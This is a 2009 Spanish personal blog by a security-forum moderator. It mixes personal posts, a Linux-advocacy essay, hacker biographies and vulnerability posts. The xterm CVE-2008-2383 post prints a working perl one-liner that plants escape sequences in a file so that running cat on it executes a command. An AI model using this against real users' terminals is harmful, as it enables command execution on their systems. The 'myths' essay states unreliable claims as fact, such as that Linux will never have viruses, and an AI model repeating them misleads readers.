jueves, 31 de diciembre de 2009

2010!!

Feliz año nuevo a todos

- Anon

domingo, 27 de diciembre de 2009

Desbordamiendo de Buffer

Explicando como esta organizada la memoria de manera parida y simple.

Doy un ejemplo de como sobreescribir variables en la pila, y también un fallo segmento, después se explicara usar estos errores a nuestro favor.

Por el momento este cogido basta para demostrar la idea de sobreescribir valores en la memoria, esto mediante el uso de funciones como strcpy como se muestra aqui

https://foro.elhacker.net/bugs_y_exploits/video_desbordamiento_de_buffer-t279112.0.html

CVE-2008-2383

Aqui esta el video

xterm DECRQSS Remote Command Execution Vulnerability

Como vemos este es un ejemplo sencillo de lo que se puede hacer con la vulnerabilidad, no se necesita otra cosa mas que un simple archivo, si conocemos de antemano que nuestro objetivo usa xterm en su versión 237 y el comando cat para ver los archivos rápidamente es posible hacer que ejecute comandos que nosotros queramos

Hijo de la gran puta RC1

Hace mucho que hice el video. Espero y les guste

viernes, 25 de diciembre de 2009

CVE-2008-2383 xterm DECRQSS


Esto ya tiene tiempo, sin embargo nunca se hablo de el en el foro y hoy que estoy revisando la versión que yo tengo es vulnerable en mi FreeBSD

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2383
http://www.securityfocus.com/bid/33060/info

El error afecta al parecer a todos los xterm versión 237

por alguna extraña razon el xterm interpreta ciertos caracteres para ejecutar lo que siga a continuacion de ellos.

Código
perl -e 'print "\eP\$q\nid\n\e\\"' > donotcat.txt
cat donotcat.txt
 

Como vemos este es un ejemplo sencillo de lo que se puede hacer con la vulnerabilidad, no se necesita otra cosa mas que un simple archivo, si conocemos de antemano que nuestro objetivo usa xterm en su versión 237 y el comando cat para ver los archivos rápidamente es posible hacer que ejecute comandos que nosotros queramos.

- Anon

martes, 26 de mayo de 2009

SAVANNAH: The L Word Subtitles Season 1 English

OK, great time looking at the English subtitle for this serie, was looking for some that were specific for the torrent to "SAVANNAH". Since most of those I found were desynchronized.

These are perfectly synchronized

The.L.Word.Subtitle.EN.S01.SAVANNAH.zip



MD5
MD5 (The L Word - 1x01-1x02 - Pilot.srt) = 0cebb4493764dd2534777269986a36b4
MD5 (The L Word - 1x03 - Let\'s Do It.srt) = 0c93bf4f3927c5e6c5bba6981fe1b38c
MD5 (The L Word - 1x04 - Longing.srt) = 7291ede41d8c060de028198a3f3d3210
MD5 (The L Word - 1x05 - Lies, Lies, Lies.srt) = 50e8412a51ef4e57ab269ef3a595d1e7
MD5 (The L Word - 1x06 - Lawfully.srt) = 492bc219bb72067adac6ebc10dafa592
MD5 (The L Word - 1x07 - Losing It.srt) = c0e17c9c135fa8325507ad7af579767d
MD5 (The L Word - 1x08 - L\'ennui.srt) = 8e0a7daf76953231922e347d8b40fba2
MD5 (The L Word - 1x09 - Listen Up.srt) = 5e84a7d27ef7abc7d46ffdeaa1c11311
MD5 (The L Word - 1x10 - Luck, Next Time.srt) = d601b4fce25834faec5d4d4cdb0ab280
MD5 (The L Word - 1x11 - Liberally.srt) = 70fbc93d86961ef2e68806b7e94f54d4
MD5 (The L Word - 1x12 - Looking Back.srt) = 2daeb5aaf64acfa931bd33edd9f893a0
MD5 (The L Word - 1x13 - Locked Up.srt) = aed3796fa11d47b1d7fbe7aca8bf2f99
MD5 (The L Word - 1x14 - Limb From Limb.srt) = 4083641b34492c0283aef923332d8de0


SHA1
SHA1 (The L Word - 1x01-1x02 - Pilot.srt) = f14f00d196371bb03882c22bf63e3f6e01811aea
SHA1 (The L Word - 1x03 - Let\'s Do It.srt) = acf62df00bb4b218a30bbaf2cdd022d51f8b5a83
SHA1 (The L Word - 1x04 - Longing.srt) = 409cb39b44c404fe9522e963034df65576b1315e
SHA1 (The L Word - 1x05 - Lies, Lies, Lies.srt) = d652a2ddab525d282830895906fbe06b6ebe85b1
SHA1 (The L Word - 1x06 - Lawfully.srt) = b4428d18002341b319b219f478a98a65804ad2be
SHA1 (The L Word - 1x07 - Losing It.srt) = 4cae7f60b73a3506754572a8e03a9310386b2c23
SHA1 (The L Word - 1x08 - L\'ennui.srt) = 6ed24165996c9ad76a5ecef6431116fa50321384
SHA1 (The L Word - 1x09 - Listen Up.srt) = a285a431c4f65f32eeb2b736d5c94ed1ca0ddfb4
SHA1 (The L Word - 1x10 - Luck, Next Time.srt) = ac0ac4111fcaea4adf29997ab5f96cf00ee2d09d
SHA1 (The L Word - 1x11 - Liberally.srt) = fb1c9c0f2f799a557f95a1d0c323c9f353b1dd95
SHA1 (The L Word - 1x12 - Looking Back.srt) = 40342652c4d49504d370993aa94c9fdee148b9f0
SHA1 (The L Word - 1x13 - Locked Up.srt) = 0a944446761ef34d367f17b6fd5fb5c8874e4cfd
SHA1 (The L Word - 1x14 - Limb From Limb.srt) = 99eebd72954101a290f16fb03ca0c65c6c491aa6


Regards
--
- Anon

sábado, 16 de mayo de 2009

De vuelta por el blog. [Pensamientos]

Pues después de mucho tiempo de no escribir en el blog pienso que volveré a escribir un poco, y contarles el por que de la ausencia.

Pues nada, he conseguido nuevo trabajo y me deja mas cansado que el anterior. El trabajo anterior lo sigo haciendo solo que ahora es desde mi casa y solo voy a la oficina unas dos o tres veces al mes.

Ahora que gano un poco mas de dinero tengo para liquidar mas rápido las deudas y pues tengo mas para ahorrar.

En mi casa he pensado reducir los gastos que hago, me refiero a quitar algunas cosas como la televicion de paga ya que en general muchas veces rondo por todos los canales sin nada que ver. Por eso prefiero mejor descargar las series de televicion que me gustan, asi las disfruto sin comerciales y puedo ponerle los subtitulos que quiera, que generalmente son en ingles para asi poder mejorar mi entendimiento del ingles y la pronunciacion.

Ultimamente es estado un poco nostalgico y deprimido, muchas veces grito de desesperacion. Siento que me falta un poco de motivacion tambien por ello no he actualizado el blog, muchos diran que es por el trabajo nuevo que de hecho el 15 de abril es cuando empeze a trabar ahi, y fue cuando deje de actualizar el blog, sin embargo yo digo que no, el trabajo me gusta y la verdad que el tiempo ahi se me pasa muy rapido, pues todo el dia estoy ocupado.

El trabajo que tengo desde mi casa, pues solo consiste en pasar algunos scripts SQL al MySQL y generar reportes que ya tengo diseñados, de vez en cuando trato de eficientar las consultas ya que el volumen de la informacion crece constantemente y algunas consultas tomas varios minutos que igual no importa mucho pero si es deceable que fuese mas rapido.

He tratado de  buscar ayuda psicologica para los problemas de deprecion sin embargo no me atrevo.

Las cosas que antes me entretenian pues ya no me llaman mucho la atencion, el foro se mueve como de costumbre, borrar mensajes de lanzadores, y dudas que ya se han escrito 100 veces (Cosa que no deberia de suceder). NOTA no estoy quemado de moderar el foro, al contrario me divierte mucho ver a esos usuarios en las andadas claro que no duran mucho la mayoria.

Ya no agrada estar tanto tiempo en la computadora, solo esos momentos en los que me encuentro en el IRC con usuarios del foro platicando de una u otra cosa generalmente cosas off-topic. Me divierte mucho y mucho de los usuarios me mantienen animado y echandome animos.

Algunas cosas que detesto
  • Los defaces
  • Los mas de 100 usuarios que elimine del msn, por que solo me agreron para preguntarme alguna chorrada sin aportar nada
  • Aquellas personas que creen que no hay soluciones en OpenSource que superen a las tecnologias de M$
Esto ultimo va por un empleo que rechaze al parecer no hiba a llevar bien con el dueño de la empresa asi que para que arriesgarme con alguien con una mente tan cerrada como esa, claro hay soluciones M$ que son muy buenas ademas de no tener su competencia OpenSource. Sin embargo hay soluciones OpenSource que son insuperables.

En fin, por hoy es todo lo que tengo que decir.

--
- Anon

martes, 14 de abril de 2009

CVE-2008-0122 Documentación

Documentación terminada sobre el bug con dicho CVE: CVE-2008-0122.pdf

BoF en inet_network(), afecta a Servidor DNS: BIND
Referencia: CVE-2008-0122

Citar
Pequeño Off-by-One, muy simple y no pude verlo desde el principio,Enlace con el analisis que se le dio se comprende del todo el por que del Advisory

Paper: CVE-2008-0122.pdf
Porcentaje: %100
[P]
Saludos
--
- Anon

sábado, 11 de abril de 2009

Documentacion Torneo Shell

Después de tanto tiempo a continuación se expone la documentación del Torneo de explotacion de servidores o llamado por algunos Torneo Shell debido a que en un principio no se podía encontrar el shell del sistema fácilmente.

Documento sobre los preparativos, desarrollo y desenlace del Wargame
http://warzone.elhacker.net/doc/Howto - TS Warzone.pdf

Documentos que explican como pasar las primeras 3 pruebas del torneo.
http://warzone.elhacker.net/doc/Reto BoF - TS Warzone.pdf
 http://warzone.elhacker.net/doc/Reto Dejavu - TS Warzone.pdf
http://warzone.elhacker.net/doc/Reto HoF - TS Warzone.pdf
 
Otro método de pasar el 3er reto del Torneo
http://warzone.elhacker.net/doc/Reto HoF Otro metodo - TS Warzone.pdf

La documentación de la 4ta prueba esta en desarrollo y sera publicada hoy en unas horas mas, o el día de mañana.

Saludos


--
- Anon

domingo, 5 de abril de 2009

Encuesta en Bugs y Exploits

He creado una encuesta para saber que piensan los usuarios acerca de lo que se puede mejorar en el Subforo de Bug y Exploits en foro.elhacker.net

Encuesta en Bugs y Exploits

Saludos
--
- Anon

viernes, 3 de abril de 2009

GNU/Linux: Mitos y leyendas

Mitos y Leyendas

Si uno busca en la red, puede encontrar muchos documentos en los cuales gente conocedora hace una comparación objetiva entre Linux y Windows (tanto en servidores como en estaciones de trabajo). En muchos de los documentos se exponen puntos válidos y vigentes en contra de Linux, pero en muchos otros sólo se perpetúan algunos mitos acerca de este sistema operativo. Algunas personas conocieron a Linux en los tiempos del viejo Red-Hat 6.0 y debido a esto todavía creen en ellos. Algunos de estos mitos son:




1.-Si uso Linux me quedaré aislado del resto. Esto es tan falso como los romances de Michael Jackson (con mujeres). Se ha hecho un gran esfuerzo en integrar a Linux a los ambientes corporativos multiplataformas y los resultados son muy satisfactorios. Los sistemas con Linux pueden integrase a un dominio Windows y hacer uso de los recursos compartidos. Se pueden editar archivos de Word y Excel en Linux e imprimirlos en la impresora del XP y viceversa. También se puede revisar Hotmail y usar el Messenger y ICQ en un equipo Linux. De igual manera los PDF y todos los tipos de archivos de imagen, video y audio están soportados, todo sin problemas.

2.-Linux no está estandarizado. De todo los mitos, quizás este es el más infundado. Linux es la plataforma que más busca sujetarse a los estándares. Existen estándares para todo, desde aquellos que definen como se debe comportar un manejador de ventanas hasta el formato de las hojas de cálculo y los desarrolladores de linux son muy respetuosos de apegarse a todas estas reglas.

3.-Sólo un experto programador puede instalar y usar Linux. Otro mito infundado. Cualquier persona puede ser un usuario eficiente de Linux. Si su empresa compra un equipo con Linux pre-instalado, usted encenderá el equipo, usará el quemador, leera sus emails, imprimirá sus documentos, escuchara música, navegara por Internet y al final de día apagará la computadora e ira a casa (Linux es famoso por su gran estabilidad ). Todo ello sin saber una jota de programación.

4.-Linux está bien como juego, pero no para algo serio. Me gustaría saber que opina el ICBC, (el banco más grande de China con fondos que superan los 640 mil millones de dólares y que usa Linux como plataforma). Asímismo me gustaría saber que opina Google, Amazon.com, las automotrices Ford y VolksWagen, la fabricante de aeronaves de la comunidad europea Airbus y los astronautas de la estación orbital (en la cual se usa Linux extensivamente) sobre la opinión de que Linux es un "juego". De cualquer manera es un juego que todos quieren jugar: más de 38 mil millones de dólares en ganancias al año y sigue creciendo.

5.- Linux no genera empleos. "Al no haber facturación por licencias, Linux daña la economía de los países pues no hay impuestos para el gobierno ni hay empresas que pueden crear empleos". En realidad lo que está haciendo Linux es impulsar el desarrollo tecnológico (y la calidad de vida) de los países del tercer mundo: al no haber pago por licencias las empresas de tecnología (incluso las pequeñas) pueden cobrar por los servicios de soporte, personalización y desarollo. Si antes las empresas latinoamericanas solo aspiraban a quedarse con una pequeña fracción del precio de la licencia, ahora pueden pelear por una rebanada más grande del pastel ofreciendo software libre y su experiencia. Hay más trabajo para los programadores locales.

Si los antigüos administradores de Windows sólo sabían apretar una bonita secuencia de botones sin entender lo que pasaba, ahora en Buenos Aires, Santiago y México se están desarrollando verdaderas secciones de código en C o Java a un nivel de complejidad e innovación que hace apenas cinco años era impensable. Eso tiene un mayor impacto en la economía: Brasil e India (dos grandes entusiastas de Linux) se están convirtiendo en los exportadores de software de sus respectivas regiones. Por supuesto que Linux daña la economía, pero no de los países, sino la de una empresa de Redmond, en Washington, USA. ;-) .

6.-Linux es feo. Linux ha cambiado mucho, sobre todo en los tres últimos años. Hasta la versión 7.2 de Mandrake, que salió al público a mediados del 2000, Linux o más precisamente, sus escritorios principales, KDE y Gnome, adolecieron de un desarrollo gráfico que fuera al mismo ritmo que su desarrollo técnico. No todo era culpa de los escritorios, un aspecto fundamental del ambiente gráfico, el desplegado de las fuentes, lo realiza el Xserver, y su implementación no era la mejor.

Todo eso cambio al inicio del 2001 con el nuevo KDE y las mejoras al Xserver. Note que estoy hablando del 2001, de esto hace cuatro años. Actualmente Linux posee uno de los entornos gráficos más atractivos de la industria (más atractivo que el de Windows y sólo superado por el MacOSX de Apple). El ambiente gráfico de Linux es también, y por mucho, el más flexible y personalizable. Con frecuencia diseño páginas usando CSS y es una sorpresa para mí ver que en Windows las fuentes pierden definición mientras en Linux se ven nítidas.

Pero todo tiene un precio, linux se dio a conocer en 1994 como el SO más rápido del mundo, lo que era cierto. Esa rapidez, lógicamente, se ha perdido con los escritorios corporativos. No obstante, aún existen los hacker's desktops como Windowmaker, Fluxbox o FVWM, que son entornos funcionales y visualmente atractivos.

7.- En Linux no hay aplicaciones. Aunque hubo el día en que esto era cierto, ahora no pasa de ser un mito. Linux está lleno de programas maduros y totalmente funcionales:

          K3B y Nautilus queman CD's y DVD's sin problemas.

          Koffice, GnomeOffice y OpenOffice.org son suites de oficina llenas de funciones avanzadas y dotadas de herramientas de integración.

          Gnomeeting es compatible con Microsoft NetMeeting si deseamos usar nuestra cámara Web.

          Gimp es uno de los mejores editores bitmap y retoque fotográfico del mundo.

          Konqueror, Mozilla, Mozilla-Firefox, Epiphany, y Galeon son excelentes navegadores, inmunes al código malicioso de algunos sitios.

          Kontact y Evolution manejan nuestra agenda e información personal.

          Eclipse, Netbeans y Kdevelop son herramientas gráficas de programación similares a VisualStudio.
           
          Linux está lleno de reproductores multimedia como Mplayer o Xine con el que podemos ver todos los tipos de películas.

          Con Quanta y Screem se crean fácilmente páginas Web.

          Con Gaim y Kopete tenemos mensajería instantánea.

          Usando KmyMoney2, Gnucash o Facturalux, manejamos nuestras finanzas personales o las de una empresa.

Sólo existe dos grupos de programas que actualmente no pueden encontrase muy desarrollados en Linux: juegos y diseño en vectores. Sin embargo, Quake, Doom y Wolfenstein están disponibles para linux e Inkscape es un buen editor de imágenes vectoriales.

8.-Linux es gratis y por tanto, lo que se haga en él no se puede cobrar. Doblemente Falso. Linux no es gratis, que no se deba gastar en la licencia no significa que no habrá otros costos, como la capacitación y el tiempo en investigación de soluciones. El costo Total de Propiedad o TOC por sus siglas en inglés, suma los costos totales por implementar y sostener un sistema operativo. En términos generales, Linux es un 30% más barato que Windows, y ese porcentaje de ahorro aumenta año con año, pero eso no significa que Linux no requiera inversión.

Por otro lado, la licencia GPL no prohíbe cobrar por lo que se haga en Linux, de hecho, en la facturas se cobra por la instalación, configuración y en su caso, programación de software libre.

9.-Linux es difícil de manejar. Repita tres veces conmigo ?Ningún sistema operativo es fácil de usar?. Tres anécdotas para el caso:

             1. Una vez arregle un computadora para un pequeño despacho. Como suelo hacer en estos casos, primero respaldé todo el disco duro, luego formatee el disco y reinstale el SO con los programas (todos los usuarios de Windows saben a lo que me refiero pues lo deben hacer cada año, quiéranlo o no). Al final copié las carpetas de regreso,comprobé que todo funcionaba y regrese el equipo. Tres horas después un iracundo arquitecto me reclamaba que todos sus archivos se habían perdido, que yo los había borrado y que todos eran importantísimos. Fui muy preocupado a verlo pues me gusta ser serio en mi trabajo, al llegar me explicaron: ?todo se había perdido? según ellos, porqué la carpeta ?Proyectos? del ?papel tapiz? no estaba. En realidad la carpeta en C:/Mis documentos/Proyectos no tenía un acceso directo al escritorio y como no estaba allí, pues no existía. Alguien había hecho ese acceso directo años atrás y era la única manera que conocían para llegar a ellos, además de los archivos recientes del menú ?File? de Excel. En esa misma empresa había una secretaria que se jactaba de usar la muy avanzada tecla tab para dar formato a los documentos de Word en lugar de dar muchos espacios.

              2. Luego de una acalorada discusión, le aposté a un colega una comida si era capaz de encontrar, en el piso donde trabajábamos, tres personas que supiesen cambiar el IRQ de su mouse. Vale la pena mencionar el hecho de que el piso era de un banco, donde trabajaban más de cincuenta graduados universitarios. Ese día comí gratis.

              3. Hace cosa de un mes, una vecina vino a pedirme de favor si podía descargar e imprimir un documento Word que le habían enviado por hotmail, en ese momento yo estaba usando KDE. Ella abrió Mozilla, entró a hotmail, al descargar el archivo, Mozilla sugirió OpenOffice.org ella dijo OK, el archivo sólo era de dos hojas, cambio unos títulos y las palabras que el corrector ortográfico le marco, dio un clíck en imprimir, redacto la respuesta en hotmail, se puso de pié para marcharse con su impresión, en la puerta me dijo ?que raro windows?, luego me dio las gracias y se marchó. Ella había usado Linux sin siquiera darse cuenta. Por supuesto, todo salió bien porque el quipo estaba correctamente configurado, como si fuese un equipo OEM de fábrica.

No es que Linux sea difícil y Windows fácil, lo que pasa es que nosotros somos la primera generación de usuarios y lo que encontramos fue Windows, si hubiese sido MacOS o NeXT u OS/2 hubiésemos aprendido a batallar con eso, pero en realidad Windows o Linux poseen el mismo grado de dificultad.

10.-En el software libre no hay innovación. La mejor innovación que han hecho los sistemas abiertos es el mismo Internet: el protocolo TCP/IP, que le da vida a la red, fue desarrollado por el equipo BSD de Berkeley y fue liberado bajo la BSD License, mientras el deficiente protocolo NetBeui ha sido abandonado. También fue en el software libre donde se dió la primer CLI (Common Lenguaje Interface) que fue Jython, años antes que el tardió .NET de Microsoft. Los Weblogs también son una innovación libre. El respaldo distribuido de información y sistemas de monitoreo de redes están también entre las muchas innovaciones libres.

11.- Todo mundo puede ver el código de los programas libres y por eso son inseguros. En realidad, pasa todo lo contrario. Existen dos tipos de esquemas de seguridad: la tipo plaza pública en la cual todo mundo puede ver los detalles de un programa y cuando encuentra una falla avisa a todo mundo y la tipo torre de marfil donde sólo un reducido grupo puede ver el programa y cuando encuentra una falla no avisa a nadie. Al ser revisados por muchas personas y hacer públicas las fallas, es difícil que una error grave no sea detectado en un programa de software libre. En los programas torre de marfil, en cambio, las fallas pasan desapercibidas por el pequeño grupo y cuando la encuentran no avisan. En todo caso, y quizás esto es más grave, la respuesta de los programas torre de marfil es muy lenta, arreglar un grave fallo de seguridad puede tardar meses sin que los usuarios estén conscientes del peligro que corren, como ya ha pasado en varias ocasiones con Windows 2000 y XP. En la plaza pública, al ser dada a conocer una vulnerabilidad, uno puede decidir continuar con ese programa o reemplazarlo por otro que cumpla la misma función. En la torre de marfil uno no tiene esa libertad.

12.- El software libre es comunista. No hay ninguna razón por la cual desarrollar software libre vaya en contra de las reglas del mercado. De hecho, el software libre se ha revelado como un modelo de negocios novedoso y que reporta miles de millones de dólares cada año. IBM, SUN, Computer Associates y Novell son empresas que han descubierto en el SL una manera de abrir el mercado ahí donde estaba copado y han dado nuevos bríos e innovaciones a la industria. Linus Torvald quizás no sea tan rico como BIll Gates, pero ciertamente su fortuna se calcula en millones de dólares y tengo serias dudas de que este planeando donarlos a la revolución cubana.

13.- No hay virus en Linux porque poca gente lo usa. Durante décadas, Unix fue el único sistema operativo que estaba disponible, su cuota de mercado era del 99%. Durante todo ese tiempo nunca hubo un virus. Los virus aprecieron al sumar Windows + Internet. Hay quienes dicen que Windows no es un sistema operativo verdadero, sino un "gestionador promiscuo de memoria y ejecutables". Cuando una archivo llega a Linux (por Internet o porque se copia de un CD) no puede ejecutarse porque no posee permisos y aunque los tuviese, no puede activar ningún servicio porque no es dueño del demonio que lo ejecuta. Esto revela un sistema operativo maduro y bien diseñado. Existen otros peligros para Linux como los troyanos o algún exploit pero por cada uno de ellos hay miles de virus. Concluyendo: en Linux (como en todos los Unix) nunca habrá virus.

14.- En linux no hay soporte. Este mito ha sido despedazado por el último reporte de ganancias trimestrales de IBM: 27.700 millones de dólares (casi el triple que Microsoft). La mayoría de este dinero proviene de servicios y soporte para Linux. EL software libre ha revolucionado el mercado: ya no se venden licencias, se venden las consultorías y el Know how. Esto ha beneficiado a las empresas pequeñas de cada país, que pueden competir dando soporte a Linux a precios muy razonables. De esta manera el dinero que se iba al norte por el estéril pago de licencias, se queda en cada país por pago de servicios.

15.- Linux no le quita mercado a Windows, sino a Unix. Si bien es cierto que Linux ha jubilado a AIX de IBM y Solaris de SUN. Lo cierto es que muchas migraciones Unix->Windows se han visto canceladas en beneficio de las nuevas Unix->Linux. El modesto crecimiento de los servidores con Windows Server 2003 durante los dos útimos años es debido a que Linux se ha convertido en la gran opción de muchas empresas que gustan de Unix pero lo encontraban muy costoso. Las únicas razones por las cuales la gente sigue instalando servidores con Windows es por pereza o por ignorancia.

--
- Anon

miércoles, 1 de abril de 2009

Hackers

Estos son los hackers mas famosos de los ultimos años



Robert Tappan Morris hijo de Robert Thomas Morris uno de los precursores de los virus y recién graduado en Computer Science en la Universidad de Cornell, en 1988 difundió un virus a través de ArpaNet, (precursora de Internet) logrando infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno de los terminales del MIT (Instituto Tecnológico de Massachussets). ArpaNet empleaba el UNIX, como sistema operativo. Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte de Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000 de multa, pena que fue conmutada a libertad bajo palabra y condenado a cumplir 400 horas de trabajo comunitario.


Kevin David Mitnick es el más famoso hackers de los últimos tiempos. Nacido el 6 de Agosto de 1963 en Van Nuts, California, desde muy niño sintió curiosidad por los sistemas de comunicación electrónica y fue cultivando un obsesivo deseo por investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para ingresar a servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc. Cuando en 1992 el gobierno acusó a Kevin de haber substraído información del FBI, relacionada a la investigación de Ferdinand Marcos y de haber penetrado en computadoras militares, el se convirtió en un símbolo entre la comunidad internacional de hackers, después de que el FBI lo investigara y persiguiera infructuosamente durante tres años, y cuya captura se produjo en 1995, cuando los investigadores rastrearon sus huellas hasta llegar a un departamento en Raleigh, en Carolina del Norte. Mitnick fue arrestado por el FBI en Raleigh, North Carolina, el 15 de Febrero de 1995. Mitnick, quién fue liberado en Enero del 2000, después de permanecer casi 5 años en un prisión federal, le costó al estado norteamericano y a empresas privadas, millones de dólares al ser objeto de hurto de su software, información y alteración de los datos de las mismas. Entre los agraviados se incluyen corporaciones tales como Motorola, Novell, Nokia y Sun Microsystems, el FBI, el Pentágono y la Universidad de Southern California.


Mark Abene más conocido como Phiber Optik, con tan solo 17 años se convirtió en un genio de la computación y de la tecnología telefónica. Lasprimeras computadoras usadas por Abene fueron una Apple II, la Timex Sinclair y una Commodore 64. Aunque el primer equipo de Mark fue una Radio Shack TSR 80, también tenía un receptor telefónico tantas veces usado, que tenía una cinta plástica enrrollada para sostener sus partes internas, desgastadas por el excesivo uso. Mark Abene era un experto en patrones de discado en receptores telefónicos. Lideró en New York, al grupo de hackers denominado "Master of Deception", MOD (Maestros de la Decepción). En Noviembre de 1989, hizo colapsar las computadoras de WNET, uno de los principales canales de televisión de la ciudad de New York, dejando un mensaje "Happy Thanksgiving you turkeys, from all of us at MOD" (Feliz Día de Acción de Gracias a Uds. pavos, de parte de todos nosotros en MOD). Una revista de New York lo catalogó, como "una de las 100 personas más inteligentes de la nación". En Julio de 1992, Abene y cuatro miembros de MOD fueron arrestados por una serie de cargos criminales. Abene se declaró culpable de los cargos federales de acceso desautorizado a computadoras de la compañia de teléfonos, incursión a computadoras y conspiración. Mark Abene pasó 10 meses en la prisión del condado Schuylkill de Pennsylvania, donde recibió tantas visitas y concedió entrevistas a periodistas y reporteros de canales de televisión, que sus compañeros de celda los apodaron CNN. Al negársele el uso de una computadora mientras estuvo en prisión, Mark Abene se convirtió en un héroe muy popular. Al salir en libertad fue empleado por su amigo Stacy Horn, del BBS denominado ECHO. Las hazañas de Abene le dieron tanta fama, que inspiraron a Michelle Slatalla y Joshua Quittne a escribir un libro titulado "The Gang That Ruled Cyberspace" (La Banda que dominó el Ciberespacio).


Johan Helsingius Responsable de uno de los más famosos servidores de mail anónimo. Fue preso por recusarse a dar información sobre un acceso que publicó documentos secretos de Church of Scientology en Internet. Tenía para eso un 486 con HD de 200Mb, y nunca preciso usar su propio servidor. El objetivo de un remailer anónimo es proteger la identidad del usuario. El servidor Remailer, no almacena los mensajes sino que sirve como un canal de re-transmisión de los mismos. El Remailer re-envía estos mensajes, sin dar a conocer la identidad del remitente original.


Chen Ing-Hou es el creador del virus CIH, que lleva sus propias iniciales. Manifiesta que siente mucho por los graves daños causados por su creación viral, pero que ello fue motivado por una venganza en contra de los que llamó "incompetentes desarrolladores de software antivirus". Chen Ing-Hou nació en la ciudad de Kaohsiung, Taipei o Taibei, capital y principal ciudad de Taiwan, y creó su famoso virus en Mayo de 1998, al cual denominó Chernobyl, en conmemoración del 13 aniversario de la tragedia ocurrida en la planta nuclear rusa. Actualmente trabaja como experto en Internet Data Security.


Sir Dystic es el hacker autor del programa original Back Orifice, lanzado en 1998, da a conocer el lanzamiento de su nueva versión para Windows 2000 y NT. El primer lanzamiento de su sistema Back Orifice fue infectado con el virus CHI y ello dio motivo a que Sir Dystic anunciara que desarrollaría un antivirus denominado CDC Protector y otro que protegería a los sistema de los troyanos, denominado CDC Monitor.


David L. Smith el 8 de Abril de 1999, David L. Smith, de 30 años, natural de Aberdeen, New Jersey y sospechoso de ser el autor del virus Melissa hizo su primera aparición en público en la Corte Superior del condado de Monmouth para escuchar las acusaciones en su contra. Smith permaneció silencioso y cabizbajo cuando escuchó los cargos. Ante el Juez John Riccardi David Smith dijo: "Sí, yo admito esos sucesos ocurridos como resultado de la propagación del virus Melissa. Pero yo no esperaba o anticipé la enorme cantidad de daño que ocasionó. Cuando difundí el virus yo supuse que algún daño material sería menor e incidental. De hecho, yo incluí instrucciones diseñadas para prevenir un daño substancial. No tuve idea de que habrían profundas consecuencias en contra de otros".


Reonel Ramones de 27 años, empleado bancario, quien vivía con su hermana y su novia Irene de Guzmán de 23, fueron acusados de ser los autores del virus LoveLetter, el mismo que según algunas evidencias, habría empezado como un conjunto de rutinas para penetrar en otros sistemas, con el objeto de sustraer la información de tarjetas de crédito de terceros. Las evidencias apuntaron a Reonel Ramonez, como cabeza del grupo que participó en la creación y difusión de este virus. Una corporación holandesa lo contrató con un sueldo muy atractivo, por considerarlo muy hábil y capaz en el desarrollo de sistemas de seguridad en Redes e Internet.


Vladimir Levin graduado en matemáticas de la Universidad Tecnológica de San Petesburgo, Rusia, fue acusado y preso por la Interpol después de meses de investigación por ser la mente maestra de una serie de fraudes tecnológicos que le permitieron a él y la banda que conformaba, substraer más de 10 millones de dólares, de cuentas corporativas del Citibank. Insiste en la idea de que uno de los abogados contratado para defenderlo es, en verdad, un agente del FBI. A pesar de que la banda substrajo más de 10 millones de dólares al Citibank, Levin fue sentenciado a 3 años de prisión y a pagar la suma de US $ 240,015 a favor del Citibank, ya que las compañías de seguros habían cubierto los montos de las corporaciones agraviadas.Los técnicos tuvieron que mejorar sus sistemas de seguridad contra "crackers" y Vladimir Levin ahora se encuentra en libertad.


Robert "Pimpshiz" Lyttle de 18 años de edad, se encuentra bajo arresto domiciliario, por orden de una Corte Juvenil de ciudad Martinez, estado de California, acusado de ser uno de los miembros del grupo Deceptive Duo, que probadamente incursionaron ilegalmente y substrajeron información de los servidores del sistema de la Federal Aviation Administration de los Estados Unidos y descargaron información confidencial relacionada a las filmaciones de las actividades de los pasajeros de los aeropuertos. Al momento de su arresto Lyttle portaba una portátil IBM ThinkPad, un lector de huellas digitales del dedo pulgar y otros sofisticados dispositivos "The Deceptive Duo" (El dúo engañoso) ingresaron a un servidor de la FAA, empleado por la administración de Seguridad de la Aviación Civil de los Estados Unidos, encargada a partir de los fatídicos incidentes del pasado 11 de Septiembre del 2001, del monitoreo de las actividades de los pasajeros en todos los aeropuertos de ese país. Cada sitio web incursionado por estos hackers, mostraba una supuesta "patriótica misión" en la cual preconizaban ser ciudadanos de los Estados Unidos de América, determinados a salvar al país de una "amenaza extranjera" al exponer los huecos de inseguridad en Internet. Incluso incluyeron el logo del grupo, consistente en dos armas de fuego delante de una bandera norteamericana. Cabe mencionar que Robert Lyttle, siendo un joven adolescente, de apenas 14 años formó la corporación Sub-Seven Software, que desarrolló herramientas tales como el Troyano buscador de puertos Sub-Net, el desinstalador Uninstall it Pro y Define, entre otros y que muchos usuarios consideramos de gran utilidad. Posiblemente se convierta en un héroe del "underground" en el ciber-espacio. En Febrero del 2002 descubrió una vulnerabilidad en el AOL Instant Messenger, y mucho antes hizo lo propio con varios sistemas de Microsoft.


Adrian Lamo Este joven de 21 años manifiesta que está ayudando a las compañías y a los usuarios a entender los límites de la seguridad en Internet, aunque sus métodos alarmen a los gigantes del medio.Famoso por no tener hogar, duerme en obras de construción, cerca de Ben Franklin en Philadelphia. Lleva siempre consigo una laptop Toshiba y un celular, pero case siempre navega en computadoras públicas con conexión del Internet, trabaja temporalmente como consultor (freelance) de seguridad, a pedido de corporaciones. Hace unos años, Lamo se hizo conocido en los círculos de hackers al haber ingresado en las redes de America on Line, Yahoo y Worldcom, informando a sus administradores la forma cómo lo hizo. Los propios administradores lo han llamado brillante y "provechoso" por descubrir estos huecos en sus redes.


